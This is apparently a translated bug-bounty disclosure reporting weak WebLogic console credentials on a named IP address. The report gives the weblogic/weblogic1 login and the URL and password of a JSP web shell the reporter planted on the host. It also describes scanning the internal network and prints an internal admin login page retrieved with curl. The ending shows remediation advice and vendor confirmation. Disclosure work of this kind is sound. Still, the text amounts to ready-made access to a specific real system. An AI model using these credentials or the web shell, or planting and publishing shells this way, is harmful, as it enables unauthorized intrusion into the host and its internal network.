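2015-12-21: Details reported to the vendor; awaiting vendor handling
2015-12-21: Vendor confirmed; details disclosed only to the vendor
2015-12-31: Details disclosed to core white hats and experts in related fields
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to trainee white hats
2016-02-01: Details disclosed to the public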
RT
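http://115.182.9.109/console
WebLogic weak credentials: weblogic / weblogic1
It appears to be a mobile API site.
Getshell address: http://115.182.9.109/ca/ma3.jsp
Password: carry
It sometimes returns 404; just press Enter a few more times.
Internal IP, so this can further threaten internal network security! Scanned the internal network segment.
curl an internal admin backend to take a look: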
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>后台管理</title><link rel="stylesheet" type="text/css" media="all" href="css/login.css" /><script type='text/javascript' src='js/md5.js'></script><script type="text/javascript" src="js/jquery.js"></script><script type='text/javascript'> function check_form(){ var username=document.getElementById("username").value; var password=document.getElementById("password").value; if(password==""||username==""){ alert('登录名与密码不能为空 ');return false; } } window.onload = function(){document.getElementById('username').focus();}</script></head><body><div id="login"><div class="warp"><div class="content"><h1></h1><form name="adminform" id="adminform" action="/index.php?action=login-checklogin" method="post" onsubmit="return check_form();"><div class="item"><div class="input"><div class="icon" title="用户名"></div><input type="text" name="username" id="username" /></div><label>用户名:</label></div><div class="item"><div class="input"><div class="icon2" title="密码"></div><input type="password" name="password" id="password" /></div><label>密码:</label></div><input type="submit" name="submit" class="submit" value="" /></form><p class="copyright">若有任何疑问,请点击帮助或与管理员联系©2012 ctvit.com.cn</p></div></div></div><script type="text/javascript">$(document).ready(function(){ $('form #adminform').submit(function(){ var status = false; $.post( 'index.php?action=login-rchecklogin', {username:$('#username').val(),password:$('#password').val()}, function(ret){ if(ret=="1"){ location.reload(); status = true; }else{ alert('用户名或密码错误,请重试!'+ret); } } ); return status; });})</script></body></html>
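Did not go any deeper; this is only a proof of impact!
Change the weak password. Getshell, requesting 20 rank!
Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-12-21 10:36
Thank you very much.
None yet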